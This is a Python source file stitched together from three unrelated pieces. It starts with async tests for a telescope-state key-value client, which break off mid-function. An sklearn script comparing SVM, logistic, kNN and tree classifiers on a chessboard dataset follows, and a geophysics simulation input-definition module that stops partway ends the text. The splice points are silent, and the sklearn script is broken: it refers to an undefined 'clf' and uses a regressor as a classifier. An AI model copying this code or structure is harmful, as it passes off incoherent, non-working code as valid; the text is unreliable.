################################################################################
# Copyright (c) 2015-2019, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Tests for the asynchronous Telescope State client."""
import asyncio
from unittest import mock
import asynctest
import async_timeout
import numpy as np
import fakeredis.aioredis
import katsdptelstate
from katsdptelstate import ImmutableKeyError, encode_value, KeyType, ENCODING_MSGPACK
from katsdptelstate.aio import TelescopeState
from katsdptelstate.aio.memory import MemoryBackend
from katsdptelstate.aio.redis import RedisBackend
class TestTelescopeState(asynctest.TestCase):
async def setUp(self) -> None:
self.ts = await self.make_telescope_state()
self.ns = self.ts.view('ns')
async def tearDown(self) -> None:
self.ts.backend.close()
await self.ts.backend.wait_closed()
async def make_telescope_state(self) -> TelescopeState:
return TelescopeState()
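    # The same suite can be run against the Redis backend by overriding
    # make_telescope_state. A minimal sketch (hypothetical wiring; the exact
    # fakeredis/RedisBackend constructor signatures may differ by version):
    #
    #   class TestTelescopeStateRedis(TestTelescopeState):
    #       async def make_telescope_state(self) -> TelescopeState:
    #           return TelescopeState(RedisBackend(fakeredis.aioredis.FakeRedis()))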
def test_bad_construct(self) -> None:
with self.assertRaises(ValueError):
TelescopeState(self.ts.backend, base=self.ts)
def test_namespace(self) -> None:
self.assertEqual(self.ts.prefixes, ('',))
self.assertEqual(self.ns.prefixes, ('ns_', ''))
ns2 = self.ns.view(b'ns_child_grandchild')
self.assertEqual(ns2.prefixes, ('ns_child_grandchild_', 'ns_', ''))
self.assertEqual(ns2.root().prefixes, ('',))
ns_excl = self.ns.view('exclusive', exclusive=True)
self.assertEqual(ns_excl.prefixes, ('exclusive_',))
async def test_basic_add(self) -> None:
await self.ts.add('test_key', 1234.5)
self.assertEqual(await self.ts['test_key'], 1234.5)
await self.ts.delete('test_key')
with self.assertRaises(KeyError):
await self.ts['test_key']
async def test_namespace_add(self) -> None:
await self.ns.add('test_key', 1234.5)
self.assertEqual(await self.ns['test_key'], 1234.5)
self.assertEqual(await self.ts[self.ts.join('ns', 'test_key')], 1234.5)
with self.assertRaises(KeyError):
await self.ts['test_key']
async def test_delete(self) -> None:
await self.ts.add('test_key', 1234.5)
self.assertTrue(await self.ts.exists('test_key'))
await self.ts.delete('test_key')
await self.ts.delete('test_key')
self.assertFalse(await self.ts.exists('test_key'))
async def test_namespace_delete(self) -> None:
await self.ts.add('parent_key', 1234.5)
await self.ns.add('child_key', 2345.6)
await self.ns.delete('child_key')
await self.ns.delete('parent_key')
self.assertEqual(await self.ts.keys(), [])
async def test_clear(self) -> None:
await self.ts.add('test_key', 1234.5)
await self.ts.add('test_key_rt', 2345.6)
await self.ts.clear()
self.assertEqual(await self.ts.keys(), [])
async def test_get_default(self) -> None:
self.assertIsNone(await self.ts.get('foo'))
self.assertEqual(await self.ts.get('foo', 'bar'), 'bar')
async def test_get_return_encoded(self) -> None:
for immutable in [True, False]:
x = np.array([(1.0, 2), (3.0, 4)], dtype=[('x', float), ('y', int)])
            await self.ts.add('test_key_rt', x, immutable=immutable)
x_decoded = await self.ts.get('test_key_rt')
self.assertTrue((x_decoded == x).all())
x_encoded = await self.ts.get('test_key_rt', return_encoded=True)
self.assertEqual(x_encoded, encode_value(x))
await self.ts.delete('test_key_rt')
async def test_get_range_return_encoded(self) -> None:
test_values = ['Test Value: {}'.format(x) for x in range(5)]
for i, test_value in enumerate(test_values):
await self.ts.add('test_key', test_value, i)
stored_values = await self.ts.get_range('test_key', st=0)
self.assertEqual(stored_values[2][0], test_values[2])
stored_values_pickled = await self.ts.get_range('test_key', st=0, return_encoded=True)
self.assertEqual(stored_values_pickled[2][0], encode_value(test_values[2]))
# check timestamp
self.assertEqual(stored_values_pickled[2][1], 2)
async def test_immutable(self) -> None:
await self.ts.add('test_immutable', 1234.5, immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_immutable', 1234.5)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_immutable', 5432.1, immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.set_indexed('test_immutable', 1234.5, 1234.5)
async def test_immutable_same_value(self) -> None:
await self.ts.add('test_immutable', 1234.5, immutable=True)
await self.ts.add('test_mutable', 1234.5)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_mutable', 2345.6, immutable=True)
async def test_immutable_same_value_str(self) -> None:
with mock.patch('katsdptelstate.encoding._allow_pickle', True), \
mock.patch('katsdptelstate.encoding._warn_on_pickle', False):
await self.ts.add('test_bytes', b'caf\xc3\xa9', immutable=True)
await self.ts.add('test_bytes', b'caf\xc3\xa9', immutable=True)
await self.ts.add('test_bytes', 'café', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_bytes', b'cafe', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_bytes', 'cafe', immutable=True)
await self.ts.add('test_unicode', 'ümlaut', immutable=True)
await self.ts.add('test_unicode', 'ümlaut', immutable=True)
await self.ts.add('test_unicode', b'\xc3\xbcmlaut', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_unicode', b'umlaut', immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_unicode', 'umlaut', immutable=True)
# Test with a binary string that isn't valid UTF-8
await self.ts.add('test_binary', b'\x00\xff', immutable=True)
await self.ts.add('test_binary', b'\x00\xff', immutable=True)
# Test Python 2/3 interop by directly injecting the pickled values
await self.ts.backend.set_immutable(b'test_2', b"S'hello'\np1\n.")
await self.ts.backend.set_immutable(b'test_3', b'Vhello\np0\n.')
await self.ts.add('test_2', 'hello', immutable=True)
await self.ts.add('test_3', 'hello', immutable=True)
# Test handling of the case where the old value cannot be decoded
# Empty string is never valid encoding
await self.ts.backend.set_immutable(b'test_failed_decode', b'')
with self.assertRaisesRegex(ImmutableKeyError, 'failed to decode the previous value'):
await self.ts.add('test_failed_decode', '', immutable=True)
async def test_immutable_none(self) -> None:
await self.ts.add('test_none', None, immutable=True)
self.assertIsNone(await self.ts.get('test_none'))
self.assertIsNone(await self.ts.get('test_none', 'not_none'))
self.assertIsNone(await self.ts['test_none'])
async def test_immutable_wrong_type(self) -> None:
await self.ts.add('test_mutable', 5)
await self.ts.add('test_indexed', 5, 5)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_mutable', 5, immutable=True)
with self.assertRaises(ImmutableKeyError):
await self.ts.add('test_indexed', 5, immutable=True)
async def test_namespace_immutable(self) -> None:
await self.ts.add('parent_immutable', 1234.5, immutable=True)
await self.ns.add('child_immutable', 2345.5, immutable=True)
with self.assertRaises(KeyError):
await self.ts['child_immutable']
self.assertEqual(await self.ns.get('child_immutable'), 2345.5)
self.assertEqual(await self.ns.get('parent_immutable'), 1234.5)
async def test_key_type(self) -> None:
await self.ts.add('parent_immutable', 1, immutable=True)
await self.ns.add('child_immutable', 2, immutable=True)
await self.ts.add('parent', 3)
await self.ns.add('child', 4)
await self.ts.set_indexed('parent_indexed', 'a', 1)
await self.ns.set_indexed('child_indexed', 'b', 2)
self.assertEqual(await self.ts.key_type('parent_immutable'), KeyType.IMMUTABLE)
self.assertEqual(await self.ts.key_type('parent'), KeyType.MUTABLE)
self.assertEqual(await self.ts.key_type('parent_indexed'), KeyType.INDEXED)
self.assertEqual(await self.ts.key_type('child_immutable'), None)
self.assertEqual(await self.ts.key_type('child'), None)
self.assertEqual(await self.ts.key_type('not_a_key'), None)
self.assertEqual(await self.ns.key_type('parent_immutable'), KeyType.IMMUTABLE)
self.assertEqual(await self.ns.key_type('parent'), KeyType.MUTABLE)
self.assertEqual(await self.ns.key_type('parent_indexed'), KeyType.INDEXED)
self.assertEqual(await self.ns.key_type('child_immutable'), KeyType.IMMUTABLE)
self.assertEqual(await self.ns.key_type('child'), KeyType.MUTABLE)
self.assertEqual(await self.ns.key_type('child_indexed'), KeyType.INDEXED)
self.assertEqual(await self.ns.key_type('not_a_key'), None)
async def test_keys(self) -> None:
await self.ts.add('key1', 'a')
await self.ns.add('key2', 'b')
await self.ns.add(b'key2', 'c')
await self.ts.add(b'immutable', 'd', immutable=True)
self.assertEqual(await self.ts.keys(), ['immutable', 'key1', 'ns_key2'])
self.assertEqual(await self.ts.keys('ns_*'), ['ns_key2'])
async def test_complex_store(self) -> None:
x = np.array([(1.0, 2), (3.0, 4)], dtype=[('x', float), ('y', int)])
await self.ts.add('test_key', x)
self.assertTrue((await self.ts['test_key'] == x).all())
async def test_exists(self) -> None:
await self.ts.add('test_key', 1234.5)
self.assertTrue(await self.ts.exists('test_key'))
self.assertFalse(await self.ts.exists('nonexistent_test_key'))
async def test_time_range(self) -> None:
await self.ts.delete('test_key')
await self.ts.add('test_key', 8192, 1)
await self.ts.add('test_key', 16384, 2)
await self.ts.add('test_key', 4096, 3)
await self.ts.add('test_key', 2048, 4)
await self.ts.add('test_immutable', 12345, immutable=True)
self.assertEqual([(2048, 4)], await self.ts.get_range('test_key'))
self.assertEqual([(16384, 2)], await self.ts.get_range('test_key', et=3))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=2, et=4, include_previous=True))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=0))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=0, et=3.5))
self.assertEqual([(8192, 1)], await self.ts.get_range('test_key', st=-1, et=1.5))
self.assertEqual([(16384, 2), (4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=2))
self.assertEqual([(8192, 1)], await self.ts.get_range('test_key', et=1.5))
self.assertEqual([], await self.ts.get_range('test_key', 3.5, 1.5))
self.assertEqual([], await self.ts.get_range('test_key', et=-0.))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=1.5, include_previous=True))
self.assertEqual([(2048, 4)],
await self.ts.get_range('test_key', st=5, et=6, include_previous=True))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=2, et=4, include_previous=True))
with self.assertRaises(KeyError):
await self.ts.get_range('not_a_key')
with self.assertRaises(ImmutableKeyError):
await self.ts.get_range('test_immutable')
async def test_time_range_include_end(self) -> None:
await self.ts.add('test_key', 1234, 0)
await self.ts.add('test_key', 8192, 1)
await self.ts.add('test_key', 16384, 2)
await self.ts.add('test_key', 4096, 3)
await self.ts.add('test_key', 2048, 4)
self.assertEqual([], await self.ts.get_range('test_key', st=1.5, et=1.5, include_end=True))
self.assertEqual([(1234, 0)],
await self.ts.get_range('test_key', st=0.0, et=0.0, include_end=True))
self.assertEqual([(1234, 0)],
await self.ts.get_range('test_key', st=0.0, et=-0.0, include_end=True))
self.assertEqual([(4096, 3), (2048, 4)],
await self.ts.get_range('test_key', st=3, et=4, include_end=True))
# include_previous tests
self.assertEqual([(8192, 1), (16384, 2)],
await self.ts.get_range('test_key', et=2, include_end=True))
self.assertEqual([(8192, 1), (16384, 2), (4096, 3)],
await self.ts.get_range('test_key', st=2, et=3,
include_previous=True, include_end=True))
async def test_add_duplicate(self) -> None:
await self.ts.add('test_key', 'value', 1234.5)
await self.ts.add('test_key', 'value', 1234.5)
self.assertEqual([('value', 1234.5)], await self.ts.get_range('test_key', st=0))
async def test_wait_key_already_done_mutable(self) -> None:
"""Calling wait_key with a condition that is met must return (mutable version)."""
await self.ts.add('test_key', 123)
value, timestamp = (await self.ts.get_range('test_key'))[0]
await self.ts.wait_key('test_key', lambda v, t: v == value and t == timestamp)
async def test_wait_key_already_done_immutable(self) -> None:
"""Calling wait_key with a condition that is met must return (immutable version)."""
await self.ts.add('test_key', 123, immutable=True)
await self.ts.wait_key('test_key', lambda v, t: v == 123 and t is None)
async def test_wait_key_already_done_indexed(self) -> None:
"""Calling wait_key with a condition that is met must return (indexed version)."""
await self.ts.set_indexed('test_key', 'idx', 5)
await self.ts.wait_key('test_key', lambda v, t: v == {'idx': 5} and t is None)
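    # In the three tests above, note the condition callback signature: wait_key
    # calls it as (value, timestamp). Mutable keys get the latest (value, ts)
    # pair, immutable keys get timestamp None, and indexed keys get the
    # accumulated {index: value} dict with timestamp None.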
async def test_wait_key_timeout(self) -> None:
"""wait_key must time out in the given time if the condition is not met"""
with self.assertRaises(asyncio.TimeoutError):
with async_timeout.timeout(0.1):
await self.ts.wait_key('test_key')
with self.assertRaises(asyncio.TimeoutError):
with async_timeout.timeout(0.1):
# Takes a different code path, even though equivalent
await self.ts.wait_key('test_key', lambda value, ts: True)
async def _set_key_immutable(self) -> None:
await asyncio.sleep(0.1)
await self.ts.set('test_key', 123)
async def _set_key_mutable(self) -> None:
await asyncio.sleep(0.1)
await self.ts.add('test_key', 123, ts=1234567890)
async def _set_key_indexed(self) -> None:
await asyncio.sleep(0.1)
await self.ts.set_indexed('test_key', 'idx', 123)
async def test_wait_key_delayed(self) -> None:
"""wait_key must succeed with a timeout that does not expire before the condition is met."""
for (set_key, value, timestamp) in [
(self._set_key_mutable, 123, 1234567890),
(self._set_key_immutable, 123, None),
(self._set_key_indexed, {'idx': 123}, None)]:
task = asyncio.ensure_future(set_key())
await self.ts.wait_key('test_key', lambda v, t: v == value and t == timestamp)
self.assertEqual(value, await self.ts.get('test_key'))
await task
await self.ts.delete('test_key')
async def test_wait_key_delayed_unconditional(self) -> None:
"""wait_key must succeed when given a timeout that does not expire before key appears."""
for set_key, value in [
(self._set_key_mutable, 123),
(self._set_key_immutable, 123),
(self._set_key_indexed, {'idx': 123})]:
task = asyncio.ensure_future(set_key())
await self.ts.wait_key('test_key')
self.assertEqual(value, await self.ts['test_key'])
await task
await self.ts.delete('test_key')
async def test_wait_key_cancel(self) -> None:
"""wait_key must deal gracefully with cancellation."""
task = asyncio.ensure_future(self.ts.wait_key('test_key'))
await asyncio.sleep(0.1)
task.cancel()
with self.assertRaises(asyncio.CancelledError):
await task
async def test_wait_key_shadow(self) -> None:
"""updates to a shadowed qualified key must be ignored"""
async def set_key(telstate):
await asyncio.sleep(0.1)
"""
This code implements a support vector classifier using the sklearn package to learn a classification model for a chessboard-like dataset.
Written using Python 3.7
"""
# builtin modules
import os
import psutil
import requests
import sys
import math
# 3rd party modules
import pandas as pd
import numpy as np
import plotly.graph_objects as go
from sklearn import datasets, linear_model            # linear_model.LogisticRegression drives the 'logistic' model; datasets is unused here
from sklearn.model_selection import train_test_split  # train/test split in train_split()
from sklearn.model_selection import KFold             # unused here; GridSearchCV builds its own folds from cv=k
from sklearn.model_selection import cross_val_score, cross_val_predict  # unused here
from sklearn.model_selection import GridSearchCV      # exhaustive hyperparameter search in apply_CSVC()
from sklearn import metrics                           # unused here
from sklearn.pipeline import make_pipeline            # unused here
from sklearn.preprocessing import StandardScaler      # unused here
from sklearn.svm import SVC                           # kernel support vector classifiers (the 'none' model type)
from sklearn.neighbors import KNeighborsClassifier    # 'knn' model
from sklearn.tree import DecisionTreeClassifier       # 'decision_tree' model
from sklearn.ensemble import RandomForestRegressor    # 'random_forest' model (a regressor, as in the original)
def get_data(source_file):
# Define input and output filepaths
input_path = os.path.join(os.getcwd(),'datasets','in', source_file)
# Read input data
df = pd.read_csv(input_path)
return df
def plot_inputs(df, names_in:list = ['A','B','label']):
"""
Plot the input dataset as a scatter plot, showing the two classes with two different patterns.
- source_file: csv file with the input samples
- weights: from perceptron_classify function
- names_in: a list of the names of the columns (headers) in the input df
returns:
- a plot of the figure in the default browser, and
- a PNG version of the plot to the "images" project directory
"""
# Create the figure for plotting the initial data
fig = go.Figure(data=go.Scatter(x=df[names_in[0]],
y=df[names_in[1]],
mode='markers',
marker=dict(
color=df[names_in[2]],
colorscale='Viridis',
line_width=1,
size = 16),
text=df[names_in[2]], # hover text goes here
showlegend=False)) # turn off legend only for this item
## Create the 1D array for X values from the first feature; this is just to be able to plot a line
## within the space defined by the two features explored
#X = np.linspace(0, max(df[names_in[0]].max(),df[names_in[1]].max()))
## Vector Y will calculated from the weights, w1, w2, the bias, b, and the value of X in its 1D linear space
#Y = []
#for b, w1, w2 in [weights]: #(matrix.tolist()[0] for matrix in weights):
# for x in X:
# if w2 == 0:
# y = 0.0
# else:
# y = (-(b / w2) / (b / w1))* x + (-b / w2) # per the equation of a line, e.g. C = Ax + By
# Y.append(y)
## Add the threshold line to the plot
#fig.add_trace(go.Scatter(x=X, y=Y,
# mode= 'lines',
# name = 'Threshold'))
# Give the figure a title
fig.update_layout(title='Perceptron Algorithm | Classification with support vector classifiers | Problem 3')
# Show the figure, by default will open a browser window
fig.show()
# export plot to png file to images directory
# create an images directory if not already present
if not os.path.exists("images"):
os.mkdir("images")
## write the png file with the plot/figure
return fig.write_image("images/fig3.png")
def plot_model(X, y, xx, y_, Z, model_type:str):
"""
Plot the decision boundary from:
- X: the features dataset,
- y: the labels vector,
- h: step size in the mesh, e.g. 0.02
- grid_search: model of the grid_search already fitted
- model_type: str of the type of model used for title of plot and filename of image to export
returns:
- a plot of the figure in the default browser, and
- a PNG version of the plot to the "images" project directory
"""
# Create the figure for plotting the model
fig = go.Figure(data=go.Scatter(x=X[:, 0], y=X[:, 1],
mode='markers',
showlegend=False,
marker=dict(size=10,
color=y,
colorscale='Jet',
line=dict(color='black', width=1))
))
# Add the heatmap to the plot
fig.add_trace(go.Heatmap(x=xx[0], y=y_, z=Z,
colorscale='Jet',
showscale=False))
# Give the figure a title and name the x,y axis as well
fig.update_layout(
title='Perceptron Algorithm | Classification with support vector classifiers | ' + model_type.upper(),
        xaxis_title='Feature A',
        yaxis_title='Feature B')
# Show the figure, by default will open a browser window
fig.show()
# export plot to png file to images directory
# create an images directory if not already present
if not os.path.exists("images"):
os.mkdir("images")
## write the png file with the plot/figure
return fig.write_image("images/fig3-" + model_type + ".png")
def train_split(df, test_percentage:float = 0.40):
# only define test_percentage,
# by default train_percentage = (1 - test_percentage)
# our X matrix will be the first two cols of the dataframe: 'A' and 'B'
X = df[df.columns[0:2]].values
# our y vector will be the third col of the dataframe: 'label'
y = df['label']
# create training and testing vars
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_percentage, stratify = y)
print (X_train.shape, y_train.shape)
print (X_test.shape, y_test.shape)
return X, y, X_train, X_test, y_train, y_test
def apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type:str, k: int, kernel_type:str, parameters:dict):
if model_type == 'logistic':
logistic = linear_model.LogisticRegression()
        # use the provided C values directly; np.logspace over the raw list
        # endpoints would yield absurd magnitudes (10**0.1 up to 10**100)
        C = parameters['C']
penalty = ['l2']
hyperparameters = dict(C=C, penalty=penalty)
grid_search = GridSearchCV(logistic, hyperparameters, cv = k, verbose = 0)
if model_type == 'knn':
grid_params = parameters
grid_search = GridSearchCV(KNeighborsClassifier(), grid_params, cv = k, verbose = 0)
if model_type == 'decision_tree':
grid_search = GridSearchCV(DecisionTreeClassifier(random_state=42), parameters, verbose=1, cv=3)
if model_type == 'random_forest':
grid_search = GridSearchCV(RandomForestRegressor(random_state=42), parameters, verbose=1, cv=3)
if model_type == 'none':
        svc = SVC()
# specify cv as integer for number of folds in (stratified)KFold,
# cv set to perform 5-fold cross validation, although 'None' already uses the default 5-fold cross validation
grid_search = GridSearchCV(svc, parameters, cv = k)
    grid_search.fit(X_train, y_train) # fit on the training split only, so the held-out test score below is meaningful
#get results best and test
best_score = grid_search.best_score_
predictions = grid_search.predict(X_test)
test_score = grid_search.score(X_test, y_test)
#print results
print("Best parameters for", kernel_type.upper(), "are:", clf.best_params_, sep=' ')
print("Best score for", kernel_type.upper(), "is:", clf.best_score_, sep=' ')
print("Test score for", kernel_type.upper(), "is:", test_score, sep=' ')
# let's plot the model
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
h = .02 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h)
, np.arange(y_min, y_max, h))
y_ = np.arange(y_min, y_max, h)
Z = grid_search.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
#print(Z)
#Z = Z.reshape((xx.shape[0], xx.shape[1], 3))
plot_model(X, y, xx, y_, Z, model_type)
return best_score, test_score
def write_csv(filename, a, b, c):
# write the outputs csv file
filepath = os.path.join(os.getcwd(),'datasets','out', filename)
df_a = pd.DataFrame(a)
df_b = pd.DataFrame(b)
df_c = pd.DataFrame(c)
df = pd.concat([df_a, df_b, df_c], axis = 1, ignore_index = True)
#dataframe = df.rename(columns={0:'alpha',1:'number_of_iterations',2:'b_0', 3:'b_age',4:'b_weight'})
df.to_csv(filepath, index = False, header = False)
return print("New Outputs file saved to: <<", filename, ">>", sep='', end='\n')
def main():
"""
## $ python3 problem3.py input3.csv output3.csv
"""
#take string for input data csv file
#in_data = str(sys.argv[1])
in_data = 'input3.csv'
#take string for output data csv file
#out_data = str(sys.argv[2])
out_data = 'output3.csv'
df = get_data(in_data)
plot_inputs(df)
X, y, X_train, X_test, y_train, y_test = train_split(df)
    best_score_linear, test_score_linear = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'none', k = 5, kernel_type = 'svm_linear', parameters = {'kernel':['linear'], 'C':[0.1, 0.5, 1, 5, 10, 50, 100]})
    best_score_poly, test_score_poly = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'none', k = 5, kernel_type = 'svm_polynomial', parameters = {'kernel':['poly'], 'gamma':[0.1, 0.5], 'C':[0.1, 1, 3], 'degree':[4, 5, 6]})
    best_score_rbf, test_score_rbf = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'none', k = 5, kernel_type = 'svm_rbf', parameters = {'kernel':['rbf'], 'gamma':[0.1, 0.5, 1, 3, 6, 10], 'C':[0.1, 0.5, 1, 5, 10, 50, 100]})
best_score_log, test_score_log = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'logistic', k = 5, kernel_type = 'logistic', parameters = {'C':[0.1, 0.5, 1, 5, 10, 50, 100]})
best_score_knn, test_score_knn = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'knn', k = 5, kernel_type = 'knn', parameters = {'n_neighbors': np.arange(1,51,1),'leaf_size': np.arange(5,61,5)})
best_score_dt, test_score_dt = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'decision_tree', k = 5, kernel_type = 'decision_tree', parameters = {'max_depth': np.arange(1,51,1),'min_samples_split': np.arange(2,11,1)})
best_score_rf, test_score_rf = apply_CSVC(X, y, X_train, X_test, y_train, y_test, model_type = 'random_forest', k = 5, kernel_type = 'random_forest', parameters = {'max_depth': np.arange(1,51,1),'min_samples_split': np.arange(2,11,1)})
    a = ['svm_linear', 'svm_polynomial', 'svm_rbf', 'logistic', 'knn', 'decision_tree', 'random_forest']
    b = [best_score_linear, best_score_poly, best_score_rbf, best_score_log, best_score_knn, best_score_dt, best_score_rf]
    c = [test_score_linear, test_score_poly, test_score_rbf, test_score_log, test_score_knn, test_score_dt, test_score_rf]
    write_csv(out_data, a, b, c)
if __name__ == '__main__':
    main()
# src/UserInput/InputDef.py
# ============================================
#
# Classes of User Input
#
# <NAME>, June 3, 2016
#
# ============================================
from math import pi, cos, sin, tan, pow
import gc
import json
import copy
import os
class Frozen(object): # A base class that prevents the creation of new attributes
__List = []
def __setattr__(self, key, value):
setIsOK = False
for item in self.__List:
if key == item:
setIsOK = True
if setIsOK == True:
object.__setattr__(self, key, value)
else:
            raise TypeError("%r has no attribute %r" % (self, key))
    def setFromDict(self, dictionary):
        """Set attributes in bulk from a dictionary (keys must appear in _Frozen__List)."""
for key in dictionary:
setattr(self, key, dictionary[key])
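# Example of the Frozen guard (a sketch): attributes not declared in
# _Frozen__List are rejected, which catches typos in user scripts early.
#
#   grid = Grid()
#   grid.nxC = 128   # fine: "nxC" is declared
#   grid.nXc = 128   # raises TypeError immediately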
from MaterialsDef import Material
class Setup(Frozen):
_Frozen__List = ["Description","Physics","Grid","Numerics","Particles","Char","Visu","BC","IC","Geometry","MatProps","Output"]
def __init__(self,isDimensional=False):
self.Description = ""
self.Physics = Physics(isDimensional)
self.Grid = Grid()
self.Numerics = Numerics()
self.Particles = Particles()
self.Char = Char()
self.Visu = Visu()
self.BC = BC()
self.IC = IC()
self.Geometry = {}
self.MatProps = {}
self.Output = Output()
class Grid(Frozen):
_Frozen__List = ["xmin","xmax","ymin","ymax","nxC","nyC","fixedBox"]
def __init__(self):
self.xmin = -.5
self.xmax = .5
self.ymin = -.5
self.ymax = .5
self.nxC = 64
self.nyC = 64
        #self.ySeg = self.xmin
self.fixedBox = False
class Numerics(Frozen):
_Frozen__List = ["nTimeSteps", "maxTime", "nLineSearch", "maxNonLinearIter", "minNonLinearIter", "relativeTolerance", "absoluteTolerance","maxCorrection","CFL_fac_Stokes","CFL_fac_Thermal","CFL_fac_Darcy","etaMin","etaMax","phiMin","phiMax","phiCrit","dtMin","dtMax","use_dtMaxwellLimit","stickyAirSwitchingDepth","stickyAirSwitchPhaseTo","stickyAirSwitchPassiveTo","stickyAirTimeSwitchPassive","dtAlphaCorr","dtVep","dtMaxwellFac_EP_ov_E","dtMaxwellFac_VP_ov_E","dtMaxwellFac_VP_ov_EP","dt_stressFac","deltaSigmaMin","dt_plasticFac","yieldComputationType", "invariantComputationType","stressSubGridDiffFac","dtIni"]
def __init__(self):
self.nTimeSteps = 1 # negative value for infinite
self.maxTime = 14*1e9*(3600*24*365) # in s, by default 14Gyrs
self.nLineSearch = 1
self.maxNonLinearIter = 1 # should always be greater than the number of line searches
self.minNonLinearIter = 1 # should always be greater than the number of line searches
self.relativeTolerance = 1E-18 # relative tolerance to the one of this time step
self.absoluteTolerance = 1E-6 # relative tolerance to the first one of the simulation
self.maxCorrection = 1.0
self.CFL_fac_Stokes = 0.75
self.CFL_fac_Thermal = 10.0
self.CFL_fac_Darcy = 0.5
self.use_dtMaxwellLimit = True
self.etaMin = 1e-8
self.etaMax = 1e8
self.phiMin = 1e-5
self.phiMax = 0.8
self.phiCrit = 1e-4
self.dtMin = 0.
self.dtMax = 1e100
self.stickyAirSwitchingDepth = -1e100; # effectively switched off by default
self.stickyAirSwitchPhaseTo = 0
self.stickyAirSwitchPassiveTo = 0
self.stickyAirTimeSwitchPassive = 1e100
self.dtAlphaCorr = 1.0 # correction factor for the time step size (0<alpha<=1)
self.dtVep = 0.0 # if value is 0 then use dtAdv for the computation, otherwise use the value given
self.dtMaxwellFac_EP_ov_E = 0.0; # lowest, ElastoPlasticVisc / G
self.dtMaxwellFac_VP_ov_E = 0.5; # intermediate, ViscoPlasticVisc / G
self.dtMaxwellFac_VP_ov_EP = 0.5; # highest, ViscoPlasticVisc / ElastoPlasticStress
self.dt_stressFac = 1.0;
self.dt_plasticFac = 0.5 # between 0 and 1; 0 = EP/E limit; 1 = VP/EP limit
        self.deltaSigmaMin = 0.0 * 1e6 # in Pa; 0 (off) by default, e.g. 5.0*1e6 for 5 MPa
self.yieldComputationType = 1 # 0: Cell-and-Node, 1:Cell-interp2Node, 2: Markers
self.invariantComputationType = 1 # 0: (interp)^2, 1: interp(^2)
self.stressSubGridDiffFac = 1.0
self.dtIni = -1.0 # Default Dummy, in the function write_inputfile it is assigned to the value of Char.time if the dummy value has not been overwritten
class Particles(Frozen):
_Frozen__List = ["nPCX","nPCY","noiseFactor","minPartPerCellFactor","maxPartPerCellFactor","passiveGeom","passiveDx","passiveDy"]
def __init__(self):
self.nPCX = 4
self.nPCY = 4
self.noiseFactor = 0.0
self.minPartPerCellFactor = 0.2
self.maxPartPerCellFactor = 3.0
self.passiveGeom = "Grid"
self.passiveDx = 1.0
self.passiveDy = 1.0
class Physics(Frozen):
_Frozen__List = ["Cp","gx","gy","eta_f","rho_f","y_oceanSurface","Pback"]
def __init__(self,Dimensional):
if Dimensional == True:
self.Cp = 1000.0
self.gx = 0.0
self.gy = -9.81
self.eta_f = 100.0
self.rho_f = 1000.0
self.y_oceanSurface = 0.0
self.Pback = 0.0
else:
self.Cp = 1000.0
self.gx = 0.0
self.gy = -1.0
self.eta_f = 0.0001
self.rho_f = 0.3
self.y_oceanSurface = 0.0
self.Pback = 0.0
class SingleColorMap(Frozen):
_Frozen__List = ["type","colorMap","scale","center","max","log10on","A0number","colorMapRes","alphaAbsThreshold"]
def __init__(self,colormapType="Manual",colormap="Default",scale=1.0,center=0.0,maxValue=1.0,log10on=False,number=0,alphaAbsThreshold=-1.0):
self.A0number = number
self.type = colormapType # "automatic would go from min to max values"
self.colorMapRes= 0
self.colorMap = colormap
self.scale = scale
self.center = center # centered value (scaled)
self.max = maxValue # maximum value (scaled)
self.log10on = log10on
self.alphaAbsThreshold = alphaAbsThreshold # absolute value of the threshold for transparecny (not affected by log10on), negative values effectively put it off
if (self.center>self.max):
raise ValueError( "%r has a max value lower than its center value (%.2e < %.2e)" % (self, self.max,self.center) )
class ColorMapList(Frozen):
_Frozen__List = ["Viscosity","Khi","Khib","StrainRate","Stress","Velocity","VelocityDiv","SIIOvYield","PeOvYield","Pressure","Density","Temperature",
"FluidPressure","CompactionPressure","Permeability","Porosity","Phase","VxRes","VyRes","PRes","PfRes","PcRes","TRes","Strain","Vorticity","POvPlitho",
"EffectiveViscosity", "ShearModulus","ExtraField"]
def __init__(self):
self.Viscosity = SingleColorMap(log10on=True, number= 1)
self.StrainRate = SingleColorMap(log10on=True, number= 2)
self.Velocity = SingleColorMap( number= 3)
self.Pressure = SingleColorMap( number= 4)
